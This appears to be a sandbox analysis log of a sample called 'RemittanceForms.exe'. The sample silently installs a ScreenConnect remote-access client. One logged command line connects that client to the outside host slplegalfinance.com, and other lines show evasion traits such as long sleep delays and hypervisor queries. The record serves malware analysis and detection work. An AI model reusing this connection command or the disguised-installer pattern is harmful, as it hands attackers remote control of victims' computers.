Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: E50000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 2F40000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 2DB0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 65E0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 5DD0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 75E0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 85E0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 65E0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 8860000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms.exe	Memory allocated: 9860000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Memory allocated: 1450000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Memory allocated: 13A0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Memory allocated: ED0000 memory reserve \| memory write watch
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Memory allocated: 1AB60000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 1A60000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 3310000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 1AE0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 69F0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 61E0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 79F0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 89F0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 69F0000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 8C70000 memory reserve \| memory write watch
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Memory allocated: 9C70000 memory reserve \| memory write watch

Source: C:\Windows\System32\svchost.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\Downloads\RemittanceForms.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIE165.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file

Source: C:\Users\user\Downloads\RemittanceForms.exe TID: 4132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7084	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 3424	Thread sleep count: 61 > 30
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 3288	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Downloads\RemittanceForms (1).exe TID: 5552	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe TID: 6652	Thread sleep time: -34000s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
Source: C:\Windows\System32\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\svchost.exe	File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Downloads\RemittanceForms.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Thread delayed: delay time: 922337203685477

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE

Process information queried: ProcessInformation

Source: C:\Users\user\Downloads\RemittanceForms.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Process token adjusted: Debug
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process token adjusted: Debug

Source: C:\Users\user\Downloads\RemittanceForms.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\Downloads\RemittanceForms.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"

Source: unknown

Process created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.clientservice.exe" "?e=access&y=guest&h=slplegalfinance.com&p=443&s=0dff7030-637d-4802-a9cf-5f63d3c8abe9&k=bgiaaackaabsu0exaagaaaeaaqdvyezobln8wdm6xwdr4b0uasubfhp2ejosdzugmbruwvwehsuh2lvfcfwdygcjbhcbews%2fdmahacpw1tkv%2f%2bw18tijthn%2bq%2fezavwugchdfdkaqki0lnydddccsozul7%2bvqevv9snfahoisjld7xdnlpmsw%2bw682fijikr8xbdhppukmg4ksp6kf1xba7kkmnnwss1mrxckdb%2f1hqrui%2fszzdgbjvz3tc%2f3cr0lxlngeclg7dt5irihwzjf5xutinhipesoo6bsk%2bufoecyo3bjvu6prl6uky08mjz7e%2b6foqb4actm6qtr9k%2fsvfdvwq%2br7eykwxpsy6ith4x7%2f%2bv&t=newbuild"

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe	Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Users\user\Downloads\RemittanceForms.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Core.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Client.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Core.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe	Queries volume information: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Downloads\RemittanceForms (1).exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
